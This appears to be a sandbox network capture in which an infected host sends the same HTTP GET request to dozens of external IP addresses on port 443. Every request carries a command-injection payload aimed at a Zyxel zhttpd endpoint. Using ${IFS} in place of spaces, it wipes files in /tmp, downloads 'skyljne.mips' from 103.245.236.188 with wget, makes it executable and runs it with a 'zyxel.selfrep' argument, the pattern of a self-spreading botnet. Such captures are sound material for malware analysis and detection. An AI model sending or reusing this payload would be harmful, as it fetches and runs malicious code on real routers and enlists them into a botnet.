                                                Jan 12, 2024 18:16:17.306375980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3064192.168.2.233690644.25.109.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306443930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3065192.168.2.234147078.173.47.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306473970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3066192.168.2.2335402129.154.229.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306514978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3067192.168.2.235377823.229.211.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306544065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3068192.168.2.2343744140.127.83.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306590080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3069192.168.2.2341534198.91.39.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306637049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3070192.168.2.233535832.221.149.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306677103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3071192.168.2.2335734138.182.44.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306703091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3072192.168.2.2336140158.118.192.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306734085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3073192.168.2.233835261.122.8.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306780100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3074192.168.2.234260090.242.252.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306809902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3075192.168.2.2355820217.16.162.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306840897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3076192.168.2.2338792121.116.217.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306875944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3077192.168.2.234752088.180.123.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306914091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3078192.168.2.233510472.58.181.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306957006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3079192.168.2.234936643.25.19.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306993961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3080192.168.2.234984639.192.206.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307039976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3081192.168.2.2359196106.181.169.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307071924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3082192.168.2.233478467.140.221.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307107925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3083192.168.2.2343396172.121.131.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307167053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3084192.168.2.2333272162.211.53.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307189941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3085192.168.2.2345914192.152.120.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307239056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3086192.168.2.234255469.81.214.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307284117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3087192.168.2.2334472158.238.242.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307313919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3088192.168.2.234808097.142.107.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307370901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3089192.168.2.2335628142.253.37.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307404995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3090192.168.2.2336016159.15.250.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307455063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3091192.168.2.2343104205.197.83.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307496071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3092192.168.2.2355034112.180.17.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307529926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3093192.168.2.2339942103.95.47.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307564974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3094192.168.2.234557468.33.63.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307591915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3095192.168.2.2353234162.230.218.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307614088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3096192.168.2.233539463.163.115.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307672977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3097192.168.2.2341930164.169.227.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307702065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3098192.168.2.2352786137.219.23.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307785034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3099192.168.2.2356620143.252.243.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307811022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3100192.168.2.235121836.150.119.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307847977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3101192.168.2.2338604221.46.60.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307889938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3102192.168.2.2344172219.209.221.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307918072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3103192.168.2.236088243.209.89.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307969093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3104192.168.2.2354050105.224.184.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.307996035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3105192.168.2.23404828.187.114.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308047056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3106192.168.2.234496464.103.4.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308069944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3107192.168.2.235346674.137.232.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308101892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3108192.168.2.2339616168.36.96.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308132887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3109192.168.2.2350098198.90.102.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308182001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3110192.168.2.2340658110.133.206.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308223963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3111192.168.2.2352376136.100.231.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308252096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3112192.168.2.235390845.151.150.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308299065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3113192.168.2.2359574143.72.56.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308347940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3114192.168.2.235760258.201.164.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308393955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3115192.168.2.236065245.130.113.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308438063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3116192.168.2.2346280145.239.85.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308465958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3117192.168.2.234646290.228.69.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308495998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3118192.168.2.2355892218.41.48.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308542967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3119192.168.2.234871618.1.64.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308574915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3120192.168.2.2356652189.221.157.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308621883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3121192.168.2.2344306198.110.52.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308657885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3122192.168.2.234952248.182.125.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308696985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3123192.168.2.234114278.113.92.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308727980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3124192.168.2.2352552154.80.45.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308754921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3125192.168.2.2358622170.71.120.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.308801889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3126192.168.2.235913487.23.28.24443
                                                TimestampBytes transferredDirectionData
